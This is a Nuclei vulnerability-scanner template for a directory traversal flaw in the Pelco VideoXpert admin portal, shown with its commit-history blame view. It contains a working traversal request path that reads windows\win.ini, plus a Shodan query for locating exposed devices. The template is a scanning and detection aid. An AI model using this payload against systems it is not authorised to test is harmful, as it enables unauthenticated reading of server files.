nuclei-templates/vulnerabilities/videoxpert-lfi.yaml

id: videoxpert-lfi

info:
  name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal
  author: 0x_akoko
  severity: high
  description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
  reference:
    - https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
  metadata:
    verified: true
    shodan-query: title:"VideoXpert"
  tags: lfi,videoxpert

requests:
  - method: GET
    path:
      - '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - 'bit app support'
          - 'fonts'
          - 'extensions'
        condition: and
        part: body
Update and rename schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml to vulnerabilities/videoxpert-lfi.yaml 2022-09-12 08:33:36 +00:00			`id: videoxpert-lfi`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00
			`info:`
			`name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal`
			`author: 0x_akoko`
			`severity: high`
			`description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.`
Update and rename schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml to vulnerabilities/videoxpert-lfi.yaml 2022-09-12 08:33:36 +00:00			`reference:`
			`- https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html`
			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php`
			`metadata:`
			`verified: true`
			`shodan-query: title:"VideoXpert"`
			`tags: lfi,videoxpert`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-12 08:28:44 +00:00			`- '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00
			`stop-at-first-match: true`
			`matchers:`
			`- type: word`
			`words:`
Update schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-12 08:28:44 +00:00			`- 'bit app support'`
			`- 'fonts'`
			`- 'extensions'`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00			`condition: and`
			`part: body`